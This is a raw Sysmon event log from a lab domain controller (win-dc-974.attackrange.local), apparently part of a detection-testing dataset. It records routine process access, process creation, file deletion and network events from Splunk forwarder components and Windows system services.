16:51:54.371{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235011Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:54.371{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6D2A-603E-55AA-00000000AD01}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002235010Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:54.371{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6D2A-603E-55AA-00000000AD01}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002235009Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:54.372{05ADC7E1-6D2A-603E-55AA-00000000AD01}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002235008Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:54.184{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=764EBF093F630F261C4F5BECDBD64629,SHA256=7F32D93CC793F643B30CB4708849678819A974C99D22709D0AC7F1D9748B8B3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235007Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:54.168{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B54C6427DA1536B361659C7BB0045DDA,SHA256=6F738C2C50DAEF7FE9B79A8265C81DCFD3E3361AF11D1CF3B1A0160DD2696A3F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235037Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:55.723{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6D2B-603E-57AA-00000000AD01}15976C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235036Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:55.723{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235035Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:55.723{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235034Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:55.723{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235033Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:55.723{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235032Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:55.723{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6D2B-603E-57AA-00000000AD01}15976C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002235031Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:55.723{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6D2B-603E-57AA-00000000AD01}15976C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002235030Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:55.716{05ADC7E1-6D2B-603E-57AA-00000000AD01}15976C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002235029Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:55.434{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=383FC55C6DF690B3023C848CB9C9866E,SHA256=B24A1971A8BA11833061961ECF02065C2DD4C11282815C29D2D1855B9F9696AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235028Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:55.199{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEB1047150E6DF9FE00D40B0116F95F0,SHA256=E2251FF1A27C8DFBE5384DD62B92946F7B34A9108E12FD7EA53C9575A1066CAA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235027Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:55.043{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6D2B-603E-56AA-00000000AD01}11012C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235026Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:55.043{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235025Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:55.043{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235024Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:55.043{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235023Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:55.043{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235022Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:55.043{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6D2B-603E-56AA-00000000AD01}11012C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002235021Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:55.043{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6D2B-603E-56AA-00000000AD01}11012C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002235020Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:55.044{05ADC7E1-6D2B-603E-56AA-00000000AD01}11012C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002235039Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:56.746{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F749EF03CCEDECF4357BF8ED602950A3,SHA256=F7CD1885E4A424AFB7F16D79E645C189065891D5793BC5BE854196B9B60346A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235038Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:56.223{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD570DA2654E1DC742ACE62FD797EC0F,SHA256=A104B31A43D5615512A1AE02D3F944BDC3303B85E3C9E59F0F6A4EB77D7B4688,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235041Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:57.923{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6B0DB23BB5A768E6D84FA1ECF9C523D5,SHA256=C4AE574183EBB3175602BFC037CBF06C7EC41DEEC4FF8D2D405773508C0E503E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235040Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:57.246{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4261044F171E6DCC3C3E4D477D252844,SHA256=4737DD1EEFCDF860EE738585D7A8611CC6BF235230F71624963B642E196913F1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002235043Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:48.057{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local58519- 23542300x80000000000000002235042Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:58.278{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20657854429A08C71A1C3F8479284055,SHA256=8A778B48C360EA34DA282EC407C552C8F4FB33DDB1F43E15BFFBEF8972139870,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002235047Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:49.338{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60116-false10.0.1.12-8000- 354300x80000000000000002235046Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:49.072{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local58519- 23542300x80000000000000002235045Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:59.312{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBF7F42D68343D68933F26E7CF8A3DC9,SHA256=C598461D6A9A2FA54D476C11A5C7207CC3649CD3B6D9E0F5A99205B6CDAA9A06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235044Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:59.220{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=32C8B55B9D5ECC50E21113F98007AFB8,SHA256=0EEAFF228B24F40324285A936575435A8D27095A2F31E15A9DDCC0A6AC151504,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235048Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:00.340{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F002029F1D60E34E69CAF6EE5CA29A55,SHA256=25ABFF4BCA4FB5EC21A4A06DBA51AB7525EB9A0C335D515DBE8F75D4D117FC8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235049Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:01.371{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 